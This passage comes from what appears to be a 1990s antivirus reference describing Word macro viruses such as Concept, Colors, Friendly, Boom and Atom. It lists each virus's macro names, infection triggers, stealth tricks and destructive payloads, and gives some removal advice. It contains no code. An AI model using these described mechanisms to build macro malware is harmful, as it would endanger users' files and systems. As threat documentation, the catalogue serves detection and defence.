  14264. Goldfish contains 2 encrypted (Execute-Only) macros 
  14265. with a size of 1906 Bytes.
  14266. "AutoOpen"
  14267. "AutoClose"
  14268. When an infected document is opened, Goldfish will 
  14269. infect the global template (NORMAL.DOT). Further 
  14270. documents are infected when they are opened 
  14271. ("AutoOpen"). Infected documents are converted
  14272. internally into templates, which is very common for 
  14273. macro viruses.
  14274.  
  14275. Goldfish is one of very few non-destructive macro 
  14276. viruses. It only infects other files and displays the 
  14277. following text window:
  14278. "I am the goldfish, I am hungry, feed me."
  14279. The message will not go away until the user types 
  14280. in an acceptable response. The vailable answers are:
  14281. "fishfood", "worms", "worm", "pryme" and  "core".
  14282.  
  14283.  
  14284. [Word.Friendly]
  14285. Virus Name: Friendly
  14286. Alias Name: Friends, Friendly:De
  14287. Virus Type: Word macro virus
  14288. Virus Length: 9867 (20 Macros)
  14289. Symptoms: Display of texts
  14290. Place of origin: Germany
  14291. Description: This virus infects MS Word documents.   
  14292. Friendly seems to be from the same author as the macro 
  14293. virus <LBYNJ>, since it includes a reference to 
  14294. "Nightmare Joker". THe same author has written various 
  14295. other macro viruses, and is also author of the first macro
  14296. virus generation kit. Friendly is a complex macro virus 
  14297. with 20 macros:
  14298.  
  14299. "Abbrechen"
  14300. "AutoExec"
  14301. "AutoOpen"
  14302. "Cancel"
  14303. "DateiBeenden"
  14304. "DateiNeu"
  14305. "DateiOeffnen"
  14306. "DateiSchliessen"
  14307. "DateiSpeichern"
  14308. "DateiSpeichernUnter"
  14309. "ExtrasMacro"
  14310. "ExtrasMakro"
  14311. "Fast"
  14312. "FileExit"
  14313. "FileNew"
  14314. "FileOpen"
  14315. "FileSave"
  14316. "FileSaveAs"
  14317. "Infizieren"
  14318. "Talk"
  14319.  
  14320. Friendly is an effort to write a virus for more than one 
  14321. language. All macro names were translated, and internal 
  14322. English macro commands are used.  By looking at the 
  14323. currency settings (DM - German Marks), Friendly checks
  14324. if it was started from a German Microsoft Word. It looks 
  14325. like the author did not have an actual copy of the 
  14326. English Word version since some of the macro names 
  14327. were translated incorrectly (ExtrasMacro instead of 
  14328. ToolsMacro).
  14329. Friendly therefore does not work with versions other 
  14330. than the German Word version.
  14331.  
  14332. When an infected document is opened, Friendly tries to 
  14333. infect the global template (NORMAL.DOT). It checks 
  14334. the global template for a previous infection by looking 
  14335. for the text "Friendly", Author = Nightmare". After the 
  14336. macros have been transfered the destructive payload is 
  14337. called from the "Fast" macro. 
  14338.  
  14339. Friendly infects other documents whenever either new 
  14340. ones are created, an action is canceled, and whenever 
  14341. documents are opened, closed, saved, or Exited from 
  14342. Word. As very common with macro viruses, an infected 
  14343. document is internally changed into a template. 
  14344. Friendly does not check for a previous document 
  14345. infection. It simply overwrites existing macros.
  14346.  
  14347. The destructive payload, inside the "Fast" macro, is 
  14348. called when the system clock has a second value smaller 
  14349. than 2. Friendly then creates a debug script inside the 
  14350. C:\DOS directory and makes it executable by using the 
  14351. DOS DEBUG.EXE command. In addition, Friendly 
  14352. adds an entry into AUTOEXEC.BAT, so the DOS 
  14353. based virus is started after the next boot-up. The DOS 
  14354. based virus inside Friendly has a size of 395 Bytes and 
  14355. is a memory resident companion virus encrypted with 
  14356. CryptCOM.
  14357.  
  14358. Friendly displays the following text on January 1st
  14359.  
  14360. " Ein gutes neues Jahr !"
  14361.  
  14362. and infects EXE files upon execution. COM files are 
  14363. created with the same name and with the attributes 
  14364. "READ-ONLY" and "HIDDEN".
  14365.  
  14366. If the virus is active, the following text is displayed 
  14367. when people try to look at the macro list:
  14368.  
  14369. "You can't do that!"
  14370. "I'm very anxious!"
  14371. "Hello my friend!"
  14372. "<< Friends >> Virus"
  14373.  
  14374. (translated:)
  14375.  
  14376. "Du kannst das nicht tun!"
  14377. "Ich bin sehr aengstlich!"
  14378. "Hallo mein Freund!"
  14379. "<< Friends >> Virus"
  14380.  
  14381. After May 1st Friendly displays the following text 
  14382. when infecting documents for the first time 
  14383. (except for NORMAL.DOT).
  14384.  
  14385. (translated:)
  14386.  
  14387. "Hello my Friend!"
  14388. "I'm the << Friends >> Virus and how are you?"
  14389. "Can you give me your name, please?"
  14390. "Hello .... I have a good and a bad message for you! The 
  14391. bad message is that" "you have now a Virus on your 
  14392. Harddisk and the good message is that I'm "harmless 
  14393. and useful. Press OK!"
  14394. "If you don't kill me, I will insert a programme in your 
  14395. AutoExec.bat thats "your Keyboard accelerated. 
  14396. Please .... don't kill me. Goodbye!"
  14397. The entered name will then also be displayed.
  14398.  
  14399. All the texts will be shown only once.
  14400.  
  14401. Friendly will also display various Wordbasic error 
  14402. messages, such as:
  14403. "Unbekannte(r) Befehl, Subroutine oder Funktion"
  14404. or
  14405. "Syntaxfehler"
  14406. (c) Stefan Kurtzhals 
  14407.  
  14408.  
  14409. [Word.FMT.Trajon]
  14410. Virus Name: TrojanFormat
  14411. Alias Name: FormatC, Trojan.FC
  14412. Virus Type: Word macro virus
  14413. Virus Length: 81 Bytes (1 Macro)
  14414. Symptoms: C:\ is formated
  14415. Place of origin: Posted to Usenet
  14416. Description: This virus infects MS Word documents.   
  14417.  
  14418. FormatC consists of only one virus macro:
  14419. "AutoOpen"
  14420. FormatC is not a virus but a trojan horse, which does 
  14421. not replicate.  This macro trojan contains only one 
  14422. encrypted macro, which is "AutoOpen".
  14423. When an infected document is opened, the trojan 
  14424. triggers the destructive payload, which types " Format 
  14425. C: /U " in a minimized DOS box and then formats your 
  14426. C drive.  FormatC is very unlikely to spread since it 
  14427. does not infect other files.
  14428. FormatC was also posted into Usenet with the result that 
  14429. some users lost their data.
  14430.  
  14431. (c) Stefan Kurtzhals 
  14432.  
  14433.  
  14434. [Word.Doggie]
  14435. Virus Name: Doggie
  14436. Alias Name: None
  14437. Virus Type: Word macro virus
  14438. Virus Length: 610 Bytes (3 Macros)
  14439. Symptoms: Display of windows
  14440. Place of origin: USA
  14441. Description: This virus infects MS Word documents.   
  14442.  
  14443. Doggie contains 3 macros with a size of 610 Bytes.
  14444. "Doggie"
  14445. "AutoOpen"
  14446. "FileSaveAs"
  14447. Upon opening an infected document, Doggie will infect 
  14448. the global template (NORMAL.DOT). Further 
  14449. documents are infected with the "FileSaveAs" command.
  14450. Infected documents are converted internally to templates, 
  14451. which is very common for macro viruses.
  14452.  
  14453. Doggie is one of very few non-destructive macro viruses. 
  14454. It only infects other files and displays the following 
  14455. text window:
  14456.  
  14457. "Doggie "
  14458. Since Doggie uses English macro names ("FileSaveAs") 
  14459. it will only work with the English version of Microsoft Word.
  14460.  
  14461.  
  14462. [WORD.WW2DEMO]
  14463. Virus Name: Demonstration
  14464. Alias Name: WM.DMV
  14465. Virus Type: Word macro virus
  14466. Virus Length: 3002 Bytes (1 Macro)
  14467. Symptoms: Display of messages
  14468. Place of origin: United States, also posted in Usenet
  14469. Description: This virus infects MS Word documents.
  14470. Demonstration contains 1 macro with a size of 3002 Bytes.
  14471. "AutoClose"
  14472. Demonstration was the first macro virus written by 
  14473. Joel McNamara, who published a detailed paper about 
  14474. macro viruses. It is believed that DMV invited additional 
  14475. virus authors to write Word macro viruses. While the paper
  14476. was not published until Concept was discovered, it helped 
  14477. virus authors to use new techniques.
  14478.  
  14479. Joel McNamara also published an Excel macro virus, 
  14480. which is non functional.
  14481.  
  14482. When an infected document is closed, DMV infects the 
  14483. global template (NORMAL.DOT). Further documents 
  14484. are infected when they are closed. They are also converted 
  14485. internally to templates, which is very common for macro
  14486. viruses.
  14487.  
  14488. Upon infection, Demonstration displays the following 
  14489. text strings on the screen:
  14490.  
  14491. " Counting global macros"
  14492. "AutoClose macro virus is already installed in 
  14493. NORMAL.DOT."
  14494. "Infected NORMAL.DOT with a copy of AutoClose 
  14495. macro virus. "
  14496. "AutoClose macro virus already present in this document."
  14497. "Saved current document as template."
  14498. "Infected current document with copy of AutoClose 
  14499. macro virus."
  14500. " Macro virus has been spread. Now execute some other code 
  14501. (good, bad, or indifferent)."
  14502.  
  14503.  
  14504. [WORD. Divina]
  14505. Virus Name: Divina
  14506. Alias Name: Roberta
  14507. Virus Type: Word macro virus
  14508. Virus Length: 2357 Bytes (1 Macro)
  14509. Symptoms: Beeps and pauses during display of messages
  14510.          Display of text windows
  14511. Place of origin: Italy
  14512. Description: This virus infects MS Word documents.
  14513.  
  14514. Devina was probably written by the author of the Date 
  14515. macro virus, and is widespread in Malta, Spain and Italy.
  14516. Divina contains only one encrypted (Execute-Only) 
  14517. macro with a size of 2357 Bytes.
  14518. "AutoClose"
  14519. Divina infects the global template (NORMAL.DOT) when 
  14520. an infected document is opened and then closed. Furher 
  14521. documents are infected when they are closed via the 
  14522. "AutoClose" command.
  14523.  
  14524. Devina has two payloads. The first payload checks the 
  14525. system time, and in case of a value of 17 in the minutes 
  14526. field, it will display a set of windows. Between each 
  14527. displayed box it will pause and beep.
  14528. The following boxes are displayed:
  14529.  
  14530. "ROBERTA TI AMO!"
  14531.  
  14532. "Virus 'ROBERTA' is running. Hard Disk damaged. 
  14533. Start antivirus?"
  14534.  
  14535. "Exit from system and low level format are recommended."
  14536.  
  14537. "Exit from System?"
  14538.  
  14539. After the last message Divina tries to exit Windows.
  14540.  
  14541. The second payload is activated on 21st May. Divina will 
  14542. again check the system clock, and if a document is being 
  14543. closed between the 10th and 20th or between the 40th and 
  14544. 50th minute, it will display another 2 windows.
  14545.  
  14546. "DIVINA IS THE BEST!"
  14547. followed by another window with an Italian message.
  14548. Divina does not contain any destructive payloads. The 
  14549. only problem with Divina is that it might panic users 
  14550. into low level formating their hard drive.
  14551.  
  14552.  
  14553. [Word.Date]
  14554. Virus Name: Date
  14555. Alias Name: AntiDMV, Infezione
  14556. Virus Type: Word macro virus
  14557. Virus Length: 1042 Bytes (1 Macro)
  14558. Symptoms: Removal of AutoClose macro from documents
  14559. Place of origin: United States
  14560. Description: This virus infects MS Word documents.
  14561.  
  14562. Date was probably written by the author of the Divina 
  14563. macro virus.  It contains only one encrypted 
  14564. (Execute-Only) macro, with a size of 1042 Bytes.
  14565. "AutoOpen"
  14566. When an infected document is opened, Date infects the 
  14567. global template (NORMAL.DOT). Further documents are 
  14568. infected when they are opened.  Infection occurs only 
  14569. until June 1st, 1996. By the time you read this document, 
  14570. Date should not be a threat anymore even though infected
  14571. documents might still be around.
  14572.  
  14573. Date is also known under the name AntiDMV. This 
  14574. name was chosen because it removes the "AutoClose" 
  14575. macro from documents. The macro virus "DMV",
  14576. which has only one "AutoClose" macro, can therefore 
  14577. be removed with the Date virus.
  14578.  
  14579.  
  14580. [WORD_CONCEPT-G]
  14581. Virus Name: Concept.G
  14582. Alias Name: Parasite, Parasite 0.8, P-Site
  14583. Virus Type: Word macro virus
  14584. Virus Length: 3670 Bytes (7 Macros) in .doc files
  14585.             3450 Bytes (7 Macros) in global templates
  14586. Symptoms: Display of Windows
  14587.           Modified documents
  14588. Place of origin: United States
  14589. Description: This virus infects MS Word documents.             
  14590. Concept.G contains 7 encrypted (Execute-Only) macros 
  14591. with a size of 3670 Bytes.
  14592. "K"
  14593. "A678"
  14594. "Para"
  14595. "Site"
  14596. "I8U9Y13"
  14597. "Paylaod"
  14598. "AutoOpen"
  14599.  
  14600. Concept.G is activated when an infected document is 
  14601. opened (AutoOpen).  Upon activation, Concept.G 
  14602. infects the global template (NORMAL.DOT).
  14603. Infectd documents are converted internally to templates, 
  14604. which is very common for macro viruses.
  14605.  
  14606. Concept.G has various payloads. The first replaces the 
  14607. following words in infected documents:
  14608. "and" with "not"
  14609. The second payload is a little bit more comprehensive. 
  14610. Concept.G checks the system time for a specific value 
  14611. in the days section. In case of a 16 (every 16th of the 
  14612. month) it activates its payloads. It then replaces the
  14613. following letters/word in infected documents:
  14614. "." (dot) with "," (comma)
  14615. "and" with "not"
  14616. "a" with an "e"
  14617. According to the Concept.G virus code, it is a beta release. 
  14618. Instead of version 1.0 (Concept.F) is it version 0.8.
  14619.  
  14620.  
  14621. [MSWORD_CONCEPT]
  14622. Virus Name: Concept
  14623. Alias Name: Prank, WW6Macro, WBMV, WW6Infector, 
  14624.           Winword 
  14625. Virus Type: Word macro virus
  14626. Virus Length: 1968 Bytes (4 Macros)
  14627. Symptoms: Display of a text window with "1" in it 
  14628. Place of origin: United States
  14629. Description: This virus infects MS Word documents.   
  14630.  
  14631. Concept was the first macro virus found "In-the-Wild". 
  14632. It was discovered in July-August 1995 and is now the 
  14633. most common virus. Macro viruses, such as Concept,  
  14634. are not dependant on operating systems. They work 
  14635. with Windows, Windows 95, Windows NT and Macintosh.
  14636.  
  14637. Word macro viruses only work as long as Microsoft 
  14638. Word is active. However they can still do permanent 
  14639. damage (for example delete important system files).
  14640.  
  14641. Concept.A contains 4 unencrypted macros with a size 
  14642. of 1968 Bytes.
  14643.  
  14644. "AAAZAO"
  14645. "AAAZFS"
  14646. "AutoOpen"
  14647. "Payload"
  14648.  
  14649. Concept.A is activated when an infected document is 
  14650. opened (AutoOpen).  Upon activation, Concept.A 
  14651. checks for a previous infection of the global template 
  14652. (NORMAL.DOT). It does this by looking for the 
  14653. "Payload" and "FileSaveAs" macro.
  14654.  
  14655. If none of the macros are present, Concept.A copies 
  14656. its virus macros to the global template by using the 
  14657. "MacroCopy" command. The macro "AAAZFS" is saved 
  14658. under the name "FileSaveAs".
  14659.  
  14660. An infected NORMAL.DOT file contains the 
  14661. following macros:
  14662. "AAAZAO"
  14663. "AAAZFS"
  14664. "FileSaveAs"
  14665. "Payload"
  14666. After Infection of the global template, Concept.A makes 
  14667. an entry in the WIN.INI file. It sets "WW6I=1" and 
  14668. shows a text window with the number "1" in it.
  14669.  
  14670. Concept.A does not contain any destructive payload, 
  14671. even though is has a macro with the name "Payload". 
  14672. The "Payload" macro is empty except for the 
  14673. following entry:
  14674.  
  14675. "That's enough to prove my point"
  14676.  
  14677. The following text can be found in the virus code, 
  14678. yet is never displayed:
  14679.  
  14680. "Payload is just for fun"
  14681.  
  14682. Since Concept.A uses English macro names, it does 
  14683. not work with foreign versions of Microsoft Word, 
  14684. such as the German version.
  14685.  
  14686. Concept.A was accidently distributed on various 
  14687. CD's (including a CD from Microsoft). This is one 
  14688. of the reasons why Concept.A is currently the most 
  14689. common virus.
  14690.  
  14691. (c) Stefan Kurtzhals 
  14692.  
  14693.  
  14694. [WORD.Colors.B]
  14695. Virus Name: Colors.B 
  14696. Alias Name: Colo-b, WM.Colors 
  14697. Virus Type: Word macro virus
  14698. Virus Length: 7006 Bytes (9 Macros)
  14699. Symptoms: 
  14700. Place of origin: Portugal
  14701. Description: This virus infects MS Word documents.             
  14702.  
  14703. Colors.B is a complex macro virus including 9 encrypted 
  14704. (Execute-Only) macros.
  14705. "AutoClose"
  14706. "AutoExec"
  14707. "AutoOpen"
  14708. "FileExit"
  14709. "FileNew"
  14710. "FileSave"
  14711. "FileSaveAs"
  14712. "macros"
  14713. "ToolsMacros"
  14714. Colors.B seems to be a version of the previous found 
  14715. Colors.A virus.  All of the macros seem to be identical 
  14716. to Colors.A, except for the "AutoOpen" macro, which 
  14717. seems to come from Concept.A. It looks like a Colors.A 
  14718. infected document was then infected with Concept, which
  14719. replaced the "AutoOpen" macro with its own.
  14720.  
  14721. Colors.B is still able to replicate, even though it has new 
  14722. virus code from a different virus. Colors.B is the first 
  14723. virus that combines virus code from 2 different viruses 
  14724. (Colors.A and Concept.A).
  14725.  
  14726. Using the Tools/Macro command to look for the macros 
  14727. from Colors.B is not recommended. The virus will 
  14728. execute when trying to do so.  Instead, use the 
  14729. File/Templates/Organizer/Macros command to detect
  14730. and delete the offending macros.
  14731.  
  14732.  
  14733. [WINWORD.COLORS]
  14734. Virus Name: Colors 
  14735. Alias Name: Rainbow, Colo-a
  14736. Virus Type: Word macro virus
  14737. Virus Length: 6470 Bytes (9 Macros)
  14738. Symptoms: Change of colors of Windows objects 
  14739. Place of origin: Portugal
  14740. Description: This virus infects MS Word documents.             
  14741.  
  14742. Colors is a complex macro virus including 9 
  14743. Execute-Only macros:
  14744. "AutoClose"
  14745. "AutoExec"
  14746. "AutoOpen"
  14747. "FileExit"
  14748. "FileNew"
  14749. "FileSave"
  14750. "FileSaveAs"
  14751. "macros"
  14752. "ToolsMacros"
  14753.  
  14754. Colors is the first macro virus that can still infect, even 
  14755. when all the Auto-Macros are turned off. It also tries to 
  14756. hide itself so the user can not use the "Tools/Macro" 
  14757. command to look at the macro list and discover the virus. 
  14758. The virus will even execute when people try to do so. Instead,
  14759. people should use File/Templates/Organizer/Macros 
  14760. command to detect and delete the offending macros. Colors
  14761. even has a Debug-mode, in which macros are not saved as 
  14762. Execute-Only (encrypted).
  14763.  
  14764. Upon the activation of one of the macros (all except for 
  14765. AutoExec), Colors will try to infect the global template 
  14766. (Normal.dot), whereby it turns off the prompting of 
  14767. Microsoft Word before saving. Colors checks if all its 
  14768. macros are already present in the global template
  14769. and if this is not the case, it transfers its macros or 
  14770. replaces already existing ones.
  14771.  
  14772. Normal.dot becomes infected when a document is opened, 
  14773. saved, closed or Microsoft Word is exited. Colors.A 
  14774. infects documents when a file is created or saved (FileNew, 
  14775. FileSave, FileSaveAs). Again Colors.A checks the Macro 
  14776. list if the document is already infected.
  14777.  
  14778. The destructive payload, plus some other functions, are 
  14779. located in the "macros" macro. The payload (a sub-routine 
  14780. "objective") is activated upon the call of each macro, 
  14781. except AutoExec. AutoExec, which is empty, was probably 
  14782. defined to overwrite existing Anti-Virus macros.
  14783.  
  14784. Colors.A creates a variable in the [Windows] section of 
  14785. WIN.INI with the name "countersu", which counts upwards 
  14786. from zero. After each 300. call, the virus then changes the 
  14787. color palette of 21 Windows desktop elements. Background, 
  14788. buttons and borders will all have new randomly selected 
  14789. colors which will leave the user with a sometimes unusual 
  14790. looking desktop.
  14791. This effect will not work on Microsoft Word for Macintosh.
  14792.  
  14793. (c) Stefan Kurtzhals 
  14794.  
  14795.  
  14796. [WINWORD.COLORS.D]
  14797. Virus Name: Colors.D 
  14798. Alias Name: Colo-d, WM.Colors 
  14799. Virus Type: Word macro virus
  14800. Virus Length: 19688 Bytes (9 Macros)
  14801. Symptoms: Display of error messages 
  14802. Place of origin: Unknown 
  14803. Description: This virus infects MS Word documents.             
  14804.  
  14805. Colors.D is a macro virus including 9 encrypted 
  14806. (Execute-Only) macros:
  14807. "AutoClose"
  14808. "AutoExec"
  14809. "AutoOpen"
  14810. "FileExit"
  14811. "FileNew"
  14812. "FileSave"
  14813. "FileSaveAs"
  14814. "macros"
  14815. "ToolsMacros"
  14816. Colors.D seems to be a combination of the previous found 
  14817. Colors.A virus and the Microsoft macro virus solution 
  14818. "Scanprot". It is not recommended using the Tools/Macro 
  14819. command to look for the macros from Colors.B. The virus 
  14820. will execute when trying to do so. Instead, use the 
  14821. File/Templates/Organizer/Macros command to detect 
  14822. and delete the offending macros.
  14823.  
  14824. Even though Colors.D has part of an Anti-Virus solution 
  14825. is its code, it is still able to spread and infect the global 
  14826. template (NORMAL.DOT) and new documents.
  14827.  
  14828. Colors.D displays the following error message:
  14829.  
  14830. "Unknown Command, Subroutine, or Function"
  14831.  
  14832.  
  14833. [WORD_CLOCK]
  14834. Virus Name: Clock 
  14835. Alias Name: Clock:De, WM.Extra 
  14836. Virus Type: Word macro virus
  14837. Virus Length: 3795 Bytes (11 Macros)
  14838. Symptoms: Display of windows 
  14839. Place of origin: USA 
  14840. Description: This virus infects MS Word documents.
  14841.  
  14842. Clock contains eleven encrypted (Execute-Only) macros 
  14843. with a size of 3795 Bytes.
  14844. "Action"
  14845. "Oeffnen"
  14846. "AutoExec"
  14847. "AutoOpen"
  14848. "Speichern"
  14849. "Extrasmakro"
  14850. "DateiSchliessen"
  14851. "Datumunduhrzeit"
  14852. "Dateidokvorlagen"
  14853. "Dateiallesspeichern"
  14854. Clock uses macro stealth techniques to hide itself. It uses 
  14855. "ExtrasMakro" ("ToolsMacro") and "DateiDokVorlagen" 
  14856. ("File Templates") to make recognition of an infected 
  14857. document more difficult.
  14858.  
  14859. When an infected document is opened, Clock 
  14860. infects the global template (NORMAL.DOT). To hide 
  14861. the infection it turns off the prompting of Word before 
  14862. saving a modified global template. Infected 
  14863. documents are converted internally into templates, 
  14864. which is very common for macro viruses.
  14865.  
  14866. When an infected document is opened after the 
  14867. 26th of each month, Clock will display a window 
  14868. containing the time. It will also activate one of
  14869. its destructive payloads, which is to set the system 
  14870. clock to a value of 33 in the seconds field. Clock 
  14871. does this every 2 to 3 minutes, which results
  14872. in a less accurate system clock.
  14873.  
  14874. The second payload will start in 1997. Clock will 
  14875. check the system clock, and in case of a minute 
  14876. value smaller than 5, it will flip the "FileOpen"
  14877. and "FileSave" macros.
  14878.  
  14879. This effect will only happen on the following days 
  14880. during the month:
  14881. 1st
  14882. 2nd
  14883. 13th
  14884. 21st
  14885. 27th.
  14886. Since Clock uses German macro names, it will only 
  14887. work with the German version of Microsoft Word.
  14888.  
  14889.  
  14890. [WORD.BueroNeu]
  14891. Virus Name: BueroNeu 
  14892. Alias Name: Buero:De, BuroNeu, Bureau 
  14893. Virus Type: Word macro virus
  14894. Virus Length: 697 Bytes (2 Macros)
  14895. Symptoms: Files deleted
  14896.           Files renamed
  14897. Place of origin: Germany 
  14898. Description: This virus infects MS Word documents.
  14899.  
  14900. Buero contains two encrypted (Execute-Only) macros 
  14901. with a size of 697 Bytes.
  14902.  
  14903. "AutoOpen"
  14904. "BueroNeu"
  14905.  
  14906. When an infected document is opened, Buero infects the 
  14907. global template (NORMAL.DOT). The global template 
  14908. includes the "DateiSpeichern"macro instead of 
  14909. "AutOpen". Further documents are infected with the 
  14910. "DateiSpeichern" ("FileSave") command. Infected documents 
  14911. are converted internally into templates, which is very 
  14912. common for macro viruses.
  14913.  
  14914. Upon infection Buero activates its destructive payloads. 
  14915. After August 15th, 1996, Buero renames the system file 
  14916. "IO.SYS" to "IIO.SYS". This action will leave the computer 
  14917. unbootable. The second destructive payload searches for
  14918. C:\*.DOC files and deletes them.
  14919.  
  14920. Since Buero uses German macro names ("DateiSpeichern"), 
  14921. it will only works with the German version of Microsoft Word.
  14922.  
  14923.  
  14924. [WORD.BOOM]
  14925. Virus Name: Boom 
  14926. Alias Name: Boombastic, Boom:De 
  14927. Virus Type: Word macro virus
  14928. Virus Length: 2863 Bytes (4 Macros)
  14929. Symptoms: Payload activates at 13:13:13 every 13th day
  14930.          after February 1996.
  14931.          Menu structure of Word is renamed and a new 
  14932.          Normal.dot text template will be created and 
  14933.          printed.
  14934. Place of origin: Germany 
  14935. Description: This virus infects MS Word documents.
  14936. Boom is a macro virus with 4 encrypted (Execute-Only) 
  14937. macros.
  14938. "AutoOpen"
  14939. "AutoExec"
  14940. "DateiSpeichernUnter"
  14941. "System"
  14942. Besides Xenixos, Boom is the second macro virus 
  14943. written for the German version of Microsoft Word.Boom 
  14944. varies from other known macro viruses and it is not 
  14945. known to be a variant of another macro virus. Boom 
  14946. works only with the German version of Microsoft 
  14947. Word. Other versions will only permit Boom to infect 
  14948. the global template (Normal.dot), not documents. This
  14949. limits the spread of Boom to German users of Word.
  14950.  
  14951. Inside the macro "AutoOpen" is the infection routine for 
  14952. the global template (Normal.dot). Whenever an infected
  14953. document is opened, Normal.dot will get infected. 
  14954. Boom does not use the common "KopiereMakro" 
  14955. command, instead it uses "Organisiere.Kopiere". 
  14956. Before transfering the macros, the FastSave option will 
  14957. be enabled. In addition, Boom bypasses the prompting of 
  14958. Word whenever a modified Normal.dot is saved.
  14959.  
  14960. The macro "AutoExec", (called on each start of 
  14961. Microsoft Word), has a time checking mechanism 
  14962. which will call the "System" macro whenever a time of
  14963. 13:13:13 (every month on the 13th) is reached. The 
  14964. "System" macro contains the destructive payload. 
  14965. "AutoExec" will also be called from the virus macros
  14966. "AutoOpen" and "DateiSpeichernUnter" when a document 
  14967. is opened and saved.
  14968.  
  14969. The destructive payload renames the menu structure 
  14970. of Word:
  14971.  
  14972. Datei       ->    Mr.Boombastic
  14973. Bearbeiten  ->    and
  14974. Ansicht     ->    Sir WIXALOT
  14975. Einfuegen   ->    are
  14976. Format      ->    watching
  14977. Extras      ->    you
  14978. Tabelle     ->    !
  14979. Fenster     ->    !
  14980. Hilfe       ->    !
  14981.  
  14982. Between each renaming command the virus will include 
  14983. pauses plus send a sound to the PC speaker. After the 
  14984. menu names have been changed, Boom will create a new 
  14985. global template (Normal.dot) and insert the following text:
  14986.  
  14987. "Greetings from Mr. Boombastic and Sir WIXALOT !!! "
  14988. "Oskar L., wir kriegen dich!!!"
  14989. "Dies ist eine Initiative des Institutes zur Vermeidung und 
  14990. Verbreitung von " "Peinlichkeiten, durch in der 
  14991. Oeffentlichkeit stehende Personen, unter der"
  14992. "Schirmherrschaft von Rudi S. !"
  14993.  
  14994. This text will be printed by Boom.
  14995.  
  14996. Boom also contains additional texts, such as:
  14997.  
  14998. "Mr. Boombastic and Sir WIXALOT !!!"
  14999.  
  15000. Additional destructive payloads have been modified by 
  15001. "REM's" into comments and are therfore deactivated.
  15002.  
  15003. (c) Stefan Kurtzhals 
  15004.  
  15005.  
  15006. [Word.Bandung]
  15007. Virus Name: Bandung 
  15008. Alias Name: None 
  15009. Virus Type: Word macro virus
  15010. Virus Length: 4262 Bytes (6 Macros)
  15011. Symptoms: Display of windows
  15012.           Creation of new files
  15013. Place of origin: Bandung, Indonesia 
  15014. Description: This virus infects MS Word documents.
  15015. Bandung contains 6 macros with a size of 4262 Bytes.
  15016. "AutoExec"
  15017. "AutoOpen"
  15018. "FileSave"
  15019. "FileSaveAs"
  15020. "Toolsmacro"
  15021. "Toolscustomize"
  15022. When an infected document is opened, Bandung infects the 
  15023. global template (NORMAL.DOT). Further documents are 
  15024. infected with the "FileSave" and "FileSaveAs" command. 
  15025. Infected documents are converted internally into templates, 
  15026. which is very common for macro viruses.
  15027.  
  15028. Bandung also uses macro stealth techniques to hide itself. 
  15029. It uses "ToolsMacro" to make recognition of an infected 
  15030. document more difficult.
  15031.  
  15032. Upon infection Bandung activates its destructive payloads.
  15033.  
  15034. It creates the file C:\PESAN.TXT with following message:
  15035.  
  15036. "Anda rupanya sedang sial, semua file di mesin ini kecuali 
  15037. yang berada  "
  15038. "di direktori WINDOWS dan WINWORD telah hilang, 
  15039. jangan kaget, ini bukan " "ulah Anda, tapi ini hasil 
  15040. pekerjaan saya...Barang siapa yang berhasil  "
  15041. "    menemukan cara menangkal virus ini, saya aka" + 
  15042. "n memberi listing"
  15043. "virus ini untuk Anda !!! Dan tentu saja saya akan terus
  15044. datang kesini"
  15045. " untuk memberi Anda salam dengan virus-virus terbaru 
  15046. dari saya...selamat ! "
  15047. " Bandung, Selasa,"
  15048.  
  15049. Following the message is the current Day, Month, 
  15050. Year, Date and Time.
  15051.  
  15052. Example:           29 Agustus 1996, Jam: 18:09
  15053. Bandung also displays the following error messages:
  15054. "                           Fail on step 29296                              "
  15055. and
  15056. "No such macro or command"
  15057.  
  15058.  
  15059. [Word.Atom]
  15060. Virus Name: Atom 
  15061. Alias Name: Atomic, WM.Atom 
  15062. Virus Type: Word macro virus
  15063. Virus Length: 1029 Bytes (4 Macros)
  15064. Symptoms: Deletes files inside directories.
  15065.           Documents are password protected.
  15066. Place of origin: Ukraine
  15067. Description: This virus infects MS Word documents.
  15068.  
  15069. Atom.A has 4 encrypted (Execute-Only) macros with a 
  15070. size of 1029 Bytes.
  15071. "Atom"
  15072. "AutoOpen"
  15073. "FileOpen"
  15074. "FileSaveAs"
  15075. Once an infected file is opened, the global template 
  15076. (Normal.dot) becomes infected if the macro "Atom" 
  15077. is not already included in the macro list.  Macros are 
  15078. transfered with the MacroCopy command, and then 
  15079. the destructive payload is called upon.
  15080.  
  15081. Atom.A infects documents in two ways, either when 
  15082. opening (FileOpen) or saving (FileSaveAs) documents. 
  15083. Since Atom.A does not turn prompting off when saving 
  15084. the global template (Normal.dot), people will be 
  15085. prompted to save changes to the global template 
  15086. (Normal.dot) at the end of a session.  Infected documents 
  15087. are internally converted into templates, which is very 
  15088. common for macro viruses.
  15089.  
  15090. Upon calling the virus macro "FileSaveAs", Atom.A 
  15091. checks the system clock for a value of 13 in the seconds 
  15092. field. If this is the case then Atom.A adds the password 
  15093. "ATOM#1" to the saved document.
  15094. The destructive payload inside the "Atom" macro was 
  15095. supposed to be activated on December 13th only, yet 
  15096. due to a programming error it is actived on the 13th of 
  15097. each month. Atom.A deletes all the files inside the current
  15098. directory.
  15099.  
  15100. Atom.A does not work with Non-English versions of 
  15101. Microsoft Word, since it uses English macro names.
  15102. (c) Stefan Kurtzhals 
  15103.  
  15104.  
  15105. [WORD.ALLIANCE]
  15106. Virus Name: Alliance 
  15107. Alias Name: Aliance 
  15108. Virus Type: Word macro virus
  15109. Virus Length: 352 Bytes (1 Macro)
  15110. Symptoms: Text added to File/Properties section
  15111. Place of origin: USA
  15112. Description: This virus infects MS Word documents.
  15113.  
  15114. Aliance contains one macro with a size of 352 Bytes.
  15115. "AutoOpen"
  15116. Aliance was published on the Internet and is available 
  15117. from various VX sites on the Internet. Therefore we 
  15118. expect to see other variants of this virus.
  15119.  
  15120. Upon opening an infected document, Aliance will infect 
  15121. the global template (NORMAL.DOT). Further documents 
  15122. become infected when they are opened ("AutoOpen"). 
  15123. Infected documents are converted internally to templates, 
  15124. which is very common for macro viruses.
  15125.  
  15126. Alliance will only infect on the following dates of the month:
  15127.  
  15128. 2nd day of each month.
  15129. 7th day of each month.
  15130. 11th day of each month.
  15131. 12th day of each month.
  15132.  
  15133. Infected documents will have the following comment in 
  15134. the File/Properties section.
  15135. " You have been infected by the Alliance"
  15136.  
  15137.  
  15138.  
  15139.  
  15140.